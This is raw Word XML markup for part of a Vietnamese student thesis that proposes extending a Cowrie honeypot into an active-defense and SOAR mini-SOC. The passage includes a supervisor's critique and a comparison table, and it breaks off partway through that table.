    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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lĩnh vực giám sát dịch vụ SSH/Telnet, Cowrie được đánh giá là một trong những giải pháp Medium-Interaction Honeypot mã nguồn mở hàng đầu thế giới. Cowrie cung cấp một shell dòng lệnh ảo hóa hoàn hảo, giả lập hệ điều hành Linux Debian/Ubuntu với đầy đủ hệ thống tệp tin (filesystem), hỗ trợ các lệnh phổ biến (ls, cd, cat, wget, curl, ps, uname), cho phép ghi lại chi tiết từng phiên kết nối và tự động lưu giữ các payload mã độc mà kẻ tấn công tải lên máy bẫy.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Tuy nhiên, xu hướng phòng thủ hiện đại trên thế giới không còn dừng lại ở việc 'ngồi im chịu trận để thu thập log'. Các tổ chức nghiên cứu bảo mật hàng đầu như MITRE (với khung chiến lược MITRE Shield và MITRE Engage) đã khởi xướng cuộc cách mạng mang tên 'Phòng thủ Chủ động' (Active Defense &amp; Active Deception). Phòng thủ chủ động là sự kết hợp đồng bộ giữa:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Đánh lừa có chủ đích (Deception Operations): Dẫn dụ kẻ tấn công vào ma trận các thông tin giả mạo (Fake credentials, Canary Tokens), buộc đối phương phải tốn thời gian, công sức và nguồn lực vào những mục tiêu không có thật.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Trinh sát ngược (Reverse Reconnaissance): Ngay khi kẻ tấn công chạm vào bẫy, hệ thống lập tức kích hoạt các công cụ thu thập thông tin tình báo đối phương (OSINT, rà soát dịch vụ, phân tích chữ ký công cụ tấn công) để vẽ nên hồ sơ đầy đủ về kẻ địch.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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Tự động hóa phản ứng sự cố (SOAR): Đồng bộ hóa quy trình phát hiện, phân tích và ngăn chặn trong vòng vài giây mà không cần sự can thiệp thủ công của con người.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">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1.4 Phân tích và Giải quyết Nhận xét của Giảng viên: 'Vượt qua Giới hạn Cài đặt Ứng dụng Bề nổi'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>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0f4f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
            <w:pPr>
              <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="00468c"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">📌 LỜI CẢNH BÁO MANG TÍNH BƯỚC NGOẶT CỦA GIẢNG VIÊN HƯỚNG DẪN:</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="282828"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lời nhận xét của Giảng viên: 'Nếu chỉ đơn thuần là cài đặt Cowrie Honeypot theo hướng dẫn có sẵn trên mạng, sau đó viết một vài dòng script đọc file cowrie.json và bắn tin nhắn thông báo vào Telegram Bot khi có ai đăng nhập, thì đây chỉ là mức độ Cài đặt và Ứng dụng công cụ có sẵn (Script-kiddie / Application Configuration Level), hoàn toàn thiếu hàm lượng nghiên cứu khoa học, không có đóng góp về mặt kỹ thuật kỹ sư và chắc chắn không thể đạt điểm giỏi/xuất sắc.'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:spacing w:after="80" w:before="4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C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Đây là một nhận xét vô cùng xác đáng và mang tính chuẩn mực học thuật cao đối với một đồ án chuyên ngành An toàn thông tin. Nhận xét này đã bóc tách rõ ràng hai mức độ tiếp cận đề tài:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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Ở cách tiếp cận cũ (Mức 1 - Cài đặt ứng dụng): Sinh viên tải Cowrie về bằng lệnh git clone, chạy docker-compose up, mở file log và viết 20 dòng code Python sử dụng thư viện requests để đẩy dòng chữ 'Có IP 1.2.3.4 đang tấn công' lên một nhóm chat. Cách làm này không giải quyết được bất kỳ bài toán cốt lõi nào của SOC: Không có bộ lọc tương quan (Correlation), không có khả năng chống chọi với bão cảnh báo (Alert Flooding), không ánh xạ được kỹ thuật tấn công theo tiêu chuẩn quốc tế, không có hành động ngăn chặn tự động, và đặc biệt là hoàn toàn bị động trước kẻ tấn công.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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vượt qua giới hạn đó và nâng tầm đề tài lên Mức độ 2 (Kỹ thuật Kỹ sư &amp; Nghiên cứu Khoa học Chủ động), đồ án này đã tái cấu trúc toàn diện bài toán và xây dựng một Hệ sinh thái Active Defense &amp; SOAR Ecosystem với 5 giá trị kỹ thuật vượt trội được thể hiện trong Bảng 1.1 dưới đây:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">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1.1: So sánh sự khác biệt bản chất giữa Cài đặt Ứng dụng Bề nổi và Hệ thống Active Defense Đồ án</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="94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4"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tiêu chí Đánh giá</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mô hình Cài đặt Bề nổi (Bị Thầy chê)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hệ sinh thái Active Defense &amp; SOAR (Đồ án đề xuất)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bản chất Kiến trúc</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chỉ cài Cowrie đơn lẻ và script thông báo tĩnh.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kiến trúc Mini-SOC 5 phân lớp hoàn chỉnh, tương tác đa thành phần.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CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cơ chế Xử lý Log</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Đọc log tuyến tính, gửi tin nhắn thô liên tục (Spam).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bộ phân tích luồng JSON bất đồng bộ (Streaming Event Engine).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Động cơ Tương quan (Correlation)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Không có. Một sự kiện failed login cũng gửi alert.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Correlation Engine tự phát triển, ánh xạ tự động ma trận MITRE ATT&amp;CK.</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D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mức độ Tương tác Cảnh báo</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thông báo 1 chiều tĩnh (Plain text notification).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thẻ cảnh báo trực quan + Inline Buttons tương tác 2 chiều (Chặn, Quét, Tarpit).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Khả năng Trinh sát Ngược (OSINT)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hoàn toàn không có. Không biết IP là ai.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Reverse Intel Engine tự động query AbuseIPDB, Shodan API, quét cổng an toàn.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DA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phòng thủ Chủ động (Deception)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Honeypot mặc định, hacker dễ phát hiện chữ ký.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
